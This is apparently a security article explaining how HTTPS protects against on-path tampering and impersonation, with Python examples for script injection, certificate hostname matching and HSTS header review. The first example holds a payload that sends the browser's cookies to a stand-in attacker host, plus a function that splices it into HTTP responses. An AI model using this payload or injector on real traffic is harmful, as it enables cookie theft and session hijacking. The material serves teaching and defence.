When we think about HTTP vs. HTTPS, we often focus on the risk to sensitive information. HTTP transmits our data in clear text, so anyone on the network path can read it, while HTTPS encrypts the data to stop snooping. But confidentiality is not all that HTTPS provides.
What about tampering?
One of the other key aspects of HTTPS is to protect our communication with the server from tampering. The concern here is that someone on the path between the browser and the server (a hotspot operator, an ISP, a compromised router) can manipulate the responses sent back to the user's browser. Even if the page contains nothing sensitive worth intercepting, an attacker could modify it in transit to inject malicious content, and on plain HTTP the browser has no way to tell that the bytes it received are not the ones the server sent.
For example, they could inject malicious JavaScript into the response. The effect is the same as Cross-site Scripting, but it needs no bug in the site at all, only a plain HTTP connection. When the page loads, the browser executes that JavaScript like any other script on the page. This could result in redirecting the user to a malicious site, installing malware, or even full takeover of the system. It could also allow a crafty attacker to rewrite what is on the screen to ask for sensitive information; for example, they could show the login screen of a different site the user uses, to try to get them to enter their credentials.
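The injection above is a few lines of code for anyone on the path. The following is an added example (not code from the original post) that models the attacker side: it splices a script into an unprotected HTTP/1.1 response and fixes up Content-Length so the browser accepts it. It then shows why an integrity tag stops this. The HTTP response, the payload and the key are constructed for the example, and the HMAC is a stand-in for the AEAD record protection real TLS uses (which also encrypts, so a real attacker could not even locate the `</body>` tag).

```python
import hashlib
import hmac
from typing import Optional

# Constructed sample: a plain HTTP/1.1 response as seen by an on-path attacker.
BODY = b"<html><body><h1>Welcome back</h1></body></html>"
ORIGINAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n\r\n" + BODY
)

# Constructed payload; attacker.invalid is a reserved, non-routable name.
PAYLOAD = b"<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"


def inject_script(response: bytes, payload: bytes = PAYLOAD) -> bytes:
    """Model an on-path attacker: insert a script before </body> and rewrite
    Content-Length so the modified response still parses cleanly."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response  # not a complete HTTP/1.1 response; leave it alone
    new_body = body.replace(b"</body>", payload + b"</body>", 1)
    fixed = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(new_body)).encode()
        fixed.append(line)
    return b"\r\n".join(fixed) + sep + new_body


def content_length_ok(response: bytes) -> bool:
    """True if the Content-Length header matches the body, i.e. a browser
    would accept the response without complaint."""
    head, _, body = response.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip()) == len(body)
    return False


TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def protect(key: bytes, response: bytes) -> bytes:
    """Stand-in for TLS record protection: append a MAC over the response."""
    return response + hmac.new(key, response, hashlib.sha256).digest()


def verify(key: bytes, protected: bytes) -> Optional[bytes]:
    """Return the response if its tag verifies, else None (receiver drops it)."""
    if len(protected) < TAG_LEN:
        return None
    response, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    expected = hmac.new(key, response, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return response


if __name__ == "__main__":
    print(inject_script(ORIGINAL_RESPONSE).decode())
    key = b"constructed session key"
    print("tampered but protected verifies as:",
          verify(key, inject_script(protect(key, ORIGINAL_RESPONSE))))
```

Note that the tampered plain-HTTP response is indistinguishable from a legitimate one to the browser: headers and body are self-consistent. The protected copy fails verification the moment a single byte changes, which is the property HTTPS gives you even for pages with nothing to hide.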
HTTPS also helps the browser verify that the site it is communicating with is the right one. The certificate the server presents during the TLS handshake binds its public key to one or more domain names, and it is signed by a certificate authority the browser trusts. The browser checks that the hostname in the URL matches a name in that certificate, which makes it much harder for someone to sit in the middle of your connection and impersonate the site: they can obtain a certificate for a domain they control, but not a trusted one for yours. When the certificate doesn't match the domain name, or isn't trusted, browsers show a full-page warning instead of silently connecting, which reduces the chance that the user talks to anyone but who they believe they are talking to.
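The name check is worth seeing in code, because the wildcard rules are where people get surprised. Below is an added example (not code from the original post) of the hostname-matching step a browser performs against the certificate's subjectAltName entries, following the rules in RFC 6125 and current browser practice. The certificate dictionaries are constructed in the shape Python's `ssl.SSLSocket.getpeercert()` returns; they are not real certificates, and the attacker's domain is a reserved `.invalid` name.

```python
def dns_name_matches(pattern: str, hostname: str) -> bool:
    """Match one dNSName entry from a certificate against the requested host.

    Rules browsers enforce: comparison is case-insensitive; a wildcard must be
    the entire left-most label; there must be at least two labels after it
    (so '*.com' is rejected); and '*' matches exactly one label, so
    '*.example.com' covers api.example.com but not example.com or
    a.b.example.com. IP-address entries and IDNA are out of scope here.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    h_labels = hostname.split(".")
    if not hostname or any(not label for label in h_labels):
        return False
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    if (p_labels[0] != "*" or len(p_labels) < 3
            or any("*" in label for label in p_labels[1:])):
        return False
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def certificate_matches(cert: dict, hostname: str) -> bool:
    """Browsers consult only the subjectAltName extension; the old fallback
    to the subject commonName was dropped years ago."""
    sans = cert.get("subjectAltName", ())
    return any(kind == "DNS" and dns_name_matches(value, hostname)
               for kind, value in sans)


# Constructed certificate data, in getpeercert() layout.
SITE_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "subjectAltName": (("DNS", "www.example.com"), ("DNS", "*.example.com")),
}
# A perfectly valid certificate, but for the attacker's own name: it passes
# the signature check yet fails the name check when presented for example.com.
ATTACKER_CERT = {
    "subject": ((("commonName", "attacker.invalid"),),),
    "subjectAltName": (("DNS", "attacker.invalid"),),
}

if __name__ == "__main__":
    for host in ("www.example.com", "api.example.com", "example.com",
                 "a.b.example.com", "www.example.com.attacker.invalid"):
        print(host, "->", certificate_matches(SITE_CERT, host))
    print("attacker cert for www.example.com ->",
          certificate_matches(ATTACKER_CERT, "www.example.com"))
```

The last case is the one that matters for the man-in-the-middle scenario: a certificate that is entirely legitimate for `attacker.invalid` is still rejected for `www.example.com`, so the attacker needs a trusted CA to misissue a certificate for the victim's name, not merely any certificate.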
Browsers have come a long way in forcing HTTPS and closing off opportunities to fall back to HTTP: they block mixed content, honour HTTP Strict Transport Security (HSTS) so that a site which has sent the header is only ever requested over HTTPS afterwards, and increasingly try https:// first for addresses the user types. If your site isn't working over HTTPS, fix it right away, even if you don't think your site is sensitive.
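Of those mechanisms, HSTS is the one the site operator controls, and a weak header quietly gives back most of the protection. The following is an added example (not code from the original post) that parses a Strict-Transport-Security header the way a browser does and reports the configurations a reviewer would flag. The header sets are constructed; the one-year threshold is the minimum the hstspreload.org list accepts. Browsers only honour the header when it arrives over HTTPS, so the redirect from http:// to https:// still has to exist for the first visit.

```python
from typing import List, Optional, Tuple

ONE_YEAR = 31536000  # seconds; also the minimum max-age for the preload list


def parse_hsts(value: str) -> Optional[Tuple[int, bool, bool]]:
    """Parse a Strict-Transport-Security value into
    (max_age, include_subdomains, preload), or None if a browser would
    discard the header (max-age missing or non-numeric)."""
    max_age = None
    include_subdomains = preload = False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')  # RFC 6797 allows a quoted max-age
        if name == "max-age":
            if not arg.isdigit():
                return None
            max_age = int(arg)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None
    return max_age, include_subdomains, preload


def hsts_findings(headers: dict) -> List[str]:
    """Return the weaknesses in a response's HSTS policy. `headers` is a plain
    name -> value dict as received over HTTPS; an empty list means no findings."""
    lowered = {name.lower(): value for name, value in headers.items()}
    value = lowered.get("strict-transport-security")
    if value is None:
        return ["no Strict-Transport-Security header: the next visit can still start on http://"]
    policy = parse_hsts(value)
    if policy is None:
        return ["unparseable HSTS header (max-age missing or non-numeric): browsers discard it"]
    max_age, include_subdomains, preload = policy
    findings = []
    if max_age == 0:
        findings.append("max-age=0 tells browsers to forget the policy")
    elif max_age < ONE_YEAR:
        findings.append("max-age %d is under one year; the policy lapses quickly" % max_age)
    if not include_subdomains:
        findings.append("includeSubDomains missing: subdomains stay reachable over plain HTTP")
    if preload and (max_age < ONE_YEAR or not include_subdomains):
        findings.append("preload set but preload-list requirements (max-age >= 1 year, includeSubDomains) unmet")
    return findings


# Constructed header sets: a site with no policy, a weak one, and a hardened one.
NO_HSTS = {"Content-Type": "text/html"}
WEAK_HSTS = {"Strict-Transport-Security": "max-age=300"}
HARDENED_HSTS = {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"}

if __name__ == "__main__":
    for label, headers in (("none", NO_HSTS), ("weak", WEAK_HSTS), ("hardened", HARDENED_HSTS)):
        print(label, "->", hsts_findings(headers) or "ok")
```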